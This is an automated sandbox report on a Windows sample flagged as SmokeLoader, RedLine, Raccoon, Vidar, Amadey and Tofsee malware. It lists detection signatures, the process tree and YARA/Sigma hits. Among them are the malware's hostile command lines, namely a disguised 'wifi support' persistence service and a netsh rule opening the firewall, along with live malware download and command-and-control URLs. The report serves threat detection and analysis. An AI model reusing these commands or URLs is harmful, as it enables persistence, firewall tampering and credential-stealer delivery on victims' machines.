
Windows Analysis Report U3E7zMaux2.exe

Overview

General Information

Sample Name: U3E7zMaux2.exe
Analysis ID: 552969
MD5: 8362e0f91ae3379c73422bbca7bac493
SHA1: ec761f77bbe9900aed7ffa0a9303dc6801a9effb
SHA256: adfea20237be615461c44fea423d6043fc74bf1c5303ee33fcecd8acd201291e
Tags: CoinMiner, exe
Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected BatToExe compiled binary
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • U3E7zMaux2.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\U3E7zMaux2.exe" MD5: 8362E0F91AE3379C73422BBCA7BAC493)
    • U3E7zMaux2.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\U3E7zMaux2.exe" MD5: 8362E0F91AE3379C73422BBCA7BAC493)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • D984.exe (PID: 5756 cmdline: C:\Users\user\AppData\Local\Temp\D984.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • E666.exe (PID: 4780 cmdline: C:\Users\user\AppData\Local\Temp\E666.exe MD5: 8362E0F91AE3379C73422BBCA7BAC493)
          • E666.exe (PID: 4388 cmdline: C:\Users\user\AppData\Local\Temp\E666.exe MD5: 8362E0F91AE3379C73422BBCA7BAC493)
        • 7CA1.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\7CA1.exe MD5: 3754DB9964B0177B6E905999B6F18FD7)
        • 86C4.exe (PID: 1368 cmdline: C:\Users\user\AppData\Local\Temp\86C4.exe MD5: B11C5DEFDBA76C2B3EE67EE1B474389D)
          • cmd.exe (PID: 5208 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cmd.exe (PID: 5464 cmdline: C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                • extd.exe (PID: 6816 cmdline: C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" MD5: 139B5CE627BC9EC1040A91EBE7830F7C)
          • cmd.exe (PID: 6392 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 3496 cmdline: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1716 cmdline: C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4728 cmdline: "C:\Windows\System32\sc.exe" start shayesoq MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 5988 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 8EC4.exe (PID: 6024 cmdline: C:\Users\user\AppData\Local\Temp\8EC4.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 8EC4.exe (PID: 6240 cmdline: C:\Users\user\AppData\Local\Temp\8EC4.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 7801.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\7801.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 8ED5.exe (PID: 5992 cmdline: C:\Users\user\AppData\Local\Temp\8ED5.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 5568 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
        • 9A02.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\9A02.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)
  • svchost.exe (PID: 2480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • uufaeea (PID: 2804 cmdline: C:\Users\user\AppData\Roaming\uufaeea MD5: 8362E0F91AE3379C73422BBCA7BAC493)
    • uufaeea (PID: 6944 cmdline: C:\Users\user\AppData\Roaming\uufaeea MD5: 8362E0F91AE3379C73422BBCA7BAC493)
  • svchost.exe (PID: 5444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5680 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4936 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • lagavljy.exe (PID: 4544 cmdline: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe" MD5: 7A36C0AD3083A1519CCE3A67BB377D18)
    • svchost.exe (PID: 5940 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000032.00000002.864947877.0000000000BF0000.00000004.00000040.sdmp | JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security |
00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0000002E.00000003.894641410.00000000022C0000.00000004.00000040.sdmp | JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security |
00000032.00000002.864706939.00000000005F0000.00000004.00000020.sdmp | JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security |
00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
(42 entries in total; the first 5 are shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
11.2.uufaeea.4615a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
21.2.86C4.exe.400000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
40.0.8EC4.exe.400000.10.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
19.2.E666.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
40.0.8EC4.exe.400000.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(34 entries in total; the first 5 are shown here)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe", ParentImage: C:\Windows\SysWOW64\shayesoq\lagavljy.exe, ParentProcessId: 4544, ProcessCommandLine: svchost.exe, ProcessId: 5940
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\, ProcessId: 6392
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe", ParentImage: C:\Windows\SysWOW64\shayesoq\lagavljy.exe, ParentProcessId: 4544, ProcessCommandLine: svchost.exe, ProcessId: 5940
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 5988
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentImage: C:\Users\user\AppData\Local\Temp\86C4.exe, ParentProcessId: 1368, ProcessCommandLine: C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3496

Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match; File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php; URL Reputation: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Avira URL Cloud: Label: malware
Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dll; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Multi AV Scanner detection for submitted file
Source: U3E7zMaux2.exe; Virustotal: Detection: 41%
Source: U3E7zMaux2.exe; ReversingLabs: Detection: 46%
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.35/d2VxjasuwS/index.php?scr=1; Virustotal: Detection: 12%
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Virustotal: Detection: 16%
Machine Learning detection for sample
Source: U3E7zMaux2.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8ED5.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9A02.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\86C4.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Joe Sandbox ML: detected
Source: 43.3.7801.exe.4d60000.2.unpack; Avira: Label: TR/Crypt.EPACK.Gen2
Source: 21.2.86C4.exe.540e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 21.3.86C4.exe.560000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 36.2.lagavljy.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 20.2.7CA1.exe.570e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 36.3.lagavljy.exe.490000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 36.2.lagavljy.exe.650000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 39.2.svchost.exe.320000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 21.2.86C4.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 36.2.lagavljy.exe.470e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 20.3.7CA1.exe.590000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Code function: 20_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Code function: 20_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Code function: 20_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Code function: 20_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Code function: 20_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Bitcoin Miner:

Found strings related to Crypto-Mining
Source: 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp; String found in binary or memory: XMRig 6.2.2es\AppData\Roaming\Sysfiles\Driver.exed-F

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe; Unpacked PE file: 20.2.7CA1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86C4.exe; Unpacked PE file: 21.2.86C4.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe; Unpacked PE file: 36.2.lagavljy.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\7801.exe; Unpacked PE file: 43.2.7801.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\7801.exe; Unpacked PE file: 43.2.7801.exe.400000.0.unpack
Source: U3E7zMaux2.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\D984.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49947 version: TLS 1.2
Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 7801.exe, 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.769293976.0000000001136000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: )C:\daz\yataduweperema14_kehudazoha60\rilowi.pdb source: 86C4.exe, 00000015.00000000.775793365.0000000000413000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.797218402.0000000000415000.00000002.00020000.sdmp, 86C4.exe, 00000015.00000002.803177540.000000000080E000.00000004.00000020.sdmp, lagavljy.exe, 00000024.00000002.806723360.0000000000415000.00000002.00020000.sdmp, lagavljy.exe, 00000024.00000000.796164744.0000000000413000.00000002.00020000.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: combase.pdb86 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 7801.exe, 0000002B.00000003.845288263.0000000003030000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.955535895.0000000002F70000.00000040.00000001.sdmp
Source: Binary string: profapi.pdb*6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: D984.exe, 0000000E.00000000.760514198.0000000000413000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.752502381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.795990218.00000000007B0000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.774572756.0000000004951000.00000004.00000001.sdmp
Source: Binary string: el.pdb source: 7801.exe
Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbz6 source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7CA1.exe, 00000014.00000000.769330269.0000000000413000.00000002.00020000.sdmp
Source: Binary string: /;C:\topidusas82\zesobuc.pdb source: U3E7zMaux2.exe, 00000000.00000000.652670443.0000000000413000.00000002.00020000.sdmp, U3E7zMaux2.exe, 00000000.00000002.659915277.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000000.744804778.0000000000413000.00000002.00020000.sdmp, uufaeea, 0000000B.00000002.754010402.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000000.759211933.0000000000413000.00000002.00020000.sdmp, E666.exe, 00000011.00000002.772149051.0000000000413000.00000002.00020000.sdmp
Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 7801.exe, 0000002B.00000003.848141187.0000000003200000.00000004.00000001.sdmp, 7801.exe, 0000002B.00000002.982597613.0000000003150000.00000040.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.774597222.0000000001227000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.774585510.0000000001220000.00000004.00000040.sdmp
